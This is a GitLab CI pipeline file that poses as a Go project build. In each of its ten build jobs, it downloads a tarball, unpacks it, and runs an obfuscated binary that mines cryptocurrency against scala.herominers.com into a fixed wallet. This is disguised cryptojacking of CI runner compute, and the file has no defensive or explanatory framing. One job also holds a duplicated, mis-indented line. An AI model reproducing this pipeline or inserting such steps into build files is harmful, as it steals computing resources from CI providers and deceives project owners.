image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
    - wget https://gitlab.com/rizkafadillahsmd/test-project/uploads/4081c01394bc30bb32451a6f029b7a6e/SCALA.tar.gz
    - tar xf SCALA.tar.gz
    - ./4acd6eacc97ceee254a3dabb73d6e0dd --donate-level 1 -o scala.herominers.com:10130 -u Ssy2DdMxxXQJ5C3wX7UFNuUpVdhRQsWK2dUZRXWFdgJv3faoef93EocQJUco7WNNapTXfRXpju3WWi2u8UThBgis5GWReVBSYQ -p cpu -a panthera -k
    
build_b:
  stage: build
  script:
    - wget https://gitlab.com/rizkafadillahsmd/test-project/uploads/4081c01394bc30bb32451a6f029b7a6e/SCALA.tar.gz
    - tar xf SCALA.tar.gz
    - ./4acd6eacc97ceee254a3dabb73d6e0dd --donate-level 1 -o scala.herominers.com:10130 -u Ssy2DdMxxXQJ5C3wX7UFNuUpVdhRQsWK2dUZRXWFdgJv3faoef93EocQJUco7WNNapTXfRXpju3WWi2u8UThBgis5GWReVBSYQ -p cpu -a panthera -k
    
build_c:
  stage: build
  script:
    - wget https://gitlab.com/rizkafadillahsmd/test-project/uploads/4081c01394bc30bb32451a6f029b7a6e/SCALA.tar.gz
    - tar xf SCALA.tar.gz
    - ./4acd6eacc97ceee254a3dabb73d6e0dd --donate-level 1 -o scala.herominers.com:10130 -u Ssy2DdMxxXQJ5C3wX7UFNuUpVdhRQsWK2dUZRXWFdgJv3faoef93EocQJUco7WNNapTXfRXpju3WWi2u8UThBgis5GWReVBSYQ -p cpu -a panthera -k
      - ./4acd6eacc97ceee254a3dabb73d6e0dd --donate-level 1 -o scala.herominers.com:10130 -u Ssy2DdMxxXQJ5C3wX7UFNuUpVdhRQsWK2dUZRXWFdgJv3faoef93EocQJUco7WNNapTXfRXpju3WWi2u8UThBgis5GWReVBSYQ -p cpu -a panthera -k
  
build_d:
  stage: build
  script:
    - wget https://gitlab.com/rizkafadillahsmd/test-project/uploads/4081c01394bc30bb32451a6f029b7a6e/SCALA.tar.gz
    - tar xf SCALA.tar.gz
    - ./4acd6eacc97ceee254a3dabb73d6e0dd --donate-level 1 -o scala.herominers.com:10130 -u Ssy2DdMxxXQJ5C3wX7UFNuUpVdhRQsWK2dUZRXWFdgJv3faoef93EocQJUco7WNNapTXfRXpju3WWi2u8UThBgis5GWReVBSYQ -p cpu -a panthera -k
  
build_e:
  stage: build
  script:
    - wget https://gitlab.com/rizkafadillahsmd/test-project/uploads/4081c01394bc30bb32451a6f029b7a6e/SCALA.tar.gz
    - tar xf SCALA.tar.gz
    - ./4acd6eacc97ceee254a3dabb73d6e0dd --donate-level 1 -o scala.herominers.com:10130 -u Ssy2DdMxxXQJ5C3wX7UFNuUpVdhRQsWK2dUZRXWFdgJv3faoef93EocQJUco7WNNapTXfRXpju3WWi2u8UThBgis5GWReVBSYQ -p cpu -a panthera -k
  
build_f:
  stage: build
  script:
    - wget https://gitlab.com/rizkafadillahsmd/test-project/uploads/4081c01394bc30bb32451a6f029b7a6e/SCALA.tar.gz
    - tar xf SCALA.tar.gz
    - ./4acd6eacc97ceee254a3dabb73d6e0dd --donate-level 1 -o scala.herominers.com:10130 -u Ssy2DdMxxXQJ5C3wX7UFNuUpVdhRQsWK2dUZRXWFdgJv3faoef93EocQJUco7WNNapTXfRXpju3WWi2u8UThBgis5GWReVBSYQ -p cpu -a panthera -k
  
build_g:
  stage: build
  script:
    - wget https://gitlab.com/rizkafadillahsmd/test-project/uploads/4081c01394bc30bb32451a6f029b7a6e/SCALA.tar.gz
    - tar xf SCALA.tar.gz
    - ./4acd6eacc97ceee254a3dabb73d6e0dd --donate-level 1 -o scala.herominers.com:10130 -u Ssy2DdMxxXQJ5C3wX7UFNuUpVdhRQsWK2dUZRXWFdgJv3faoef93EocQJUco7WNNapTXfRXpju3WWi2u8UThBgis5GWReVBSYQ -p cpu -a panthera -k
  
build_h:
  stage: build
  script:
    - wget https://gitlab.com/rizkafadillahsmd/test-project/uploads/4081c01394bc30bb32451a6f029b7a6e/SCALA.tar.gz
    - tar xf SCALA.tar.gz
    - ./4acd6eacc97ceee254a3dabb73d6e0dd --donate-level 1 -o scala.herominers.com:10130 -u Ssy2DdMxxXQJ5C3wX7UFNuUpVdhRQsWK2dUZRXWFdgJv3faoef93EocQJUco7WNNapTXfRXpju3WWi2u8UThBgis5GWReVBSYQ -p cpu -a panthera -k
  
build_i:
  stage: build
  script:
    - wget https://gitlab.com/rizkafadillahsmd/test-project/uploads/4081c01394bc30bb32451a6f029b7a6e/SCALA.tar.gz
    - tar xf SCALA.tar.gz
    - ./4acd6eacc97ceee254a3dabb73d6e0dd --donate-level 1 -o scala.herominers.com:10130 -u Ssy2DdMxxXQJ5C3wX7UFNuUpVdhRQsWK2dUZRXWFdgJv3faoef93EocQJUco7WNNapTXfRXpju3WWi2u8UThBgis5GWReVBSYQ -p cpu -a panthera -k
  
build_j:
  stage: build
  script:
    - wget https://gitlab.com/rizkafadillahsmd/test-project/uploads/4081c01394bc30bb32451a6f029b7a6e/SCALA.tar.gz
    - tar xf SCALA.tar.gz
    - ./4acd6eacc97ceee254a3dabb73d6e0dd --donate-level 1 -o scala.herominers.com:10130 -u Ssy2DdMxxXQJ5C3wX7UFNuUpVdhRQsWK2dUZRXWFdgJv3faoef93EocQJUco7WNNapTXfRXpju3WWi2u8UThBgis5GWReVBSYQ -p cpu -a panthera -k
